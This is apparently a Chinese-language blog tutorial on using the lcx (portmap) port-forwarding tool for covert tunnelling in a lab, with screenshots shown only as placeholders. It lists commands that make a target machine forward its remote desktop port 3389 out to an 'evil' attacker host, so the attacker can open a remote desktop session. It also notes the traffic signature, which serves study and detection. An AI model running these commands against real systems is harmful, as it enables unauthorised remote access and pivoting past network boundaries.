隐藏隧道通信:lcx 端口转发

郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。

1 lcx 端口转发原理

lcx 是基于 Socket 套接字实现的端口转发工具,Windows 版本名称为 LCX、Linux 版本为 portmap。

一个基本的 Socket 隧道必须包含两端:

  1. 服务端:监听一个端口,等待客户端连接
  2. 客户端:通过传入服务端的 IP 地址和端口,与服务端建立连接。
lcx.exe -h
[Usage of Packet Transmit:]
 lcx.exe -<listen|tran|slave> <option> [-log logfile]

[option:]
 -listen <ConnectPort> <TransmitPort>
 -tran   <ConnectPort> <TransmitHost> <TransmitPort> # 经测试无法过 nat 有点鸡肋。
 -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>

2 实验环境

image-20211017115422798

3 配置服务端

  • 在 evil 主机上,将本机 4444 端口上监听的所有数据转发到本地的 13389 端口上
lcx.exe -listen 4444 13389

image-20211017122154543

4 配置客户端

  • 首先准备好一个具有公网 ip 的服务器,假定域名或者公网 ip 是 192.168.0.21
  • 在目标机器上将 3389 端口的所有数据转发到恶意主机的 4444 端口上。
  1. 配置 LCX 端口转发

    .\lcx.exe -slave 192.168.0.110 4444 127.0.0.1 3389
    

    image-20211017122052060

  2. 客户端与服务端建立通信连接

    image-20211017122723399

  3. 与远程主机建立远程桌面连接

    • 客户端:

      image-20211017123500180

    • 服务端:

      image-20211017123025944

  4. 抓包查看流量特征

    image-20211017123245902

posted @ 2021-10-17 14:40  f_carey  阅读(26)  评论(0编辑  收藏  举报  来源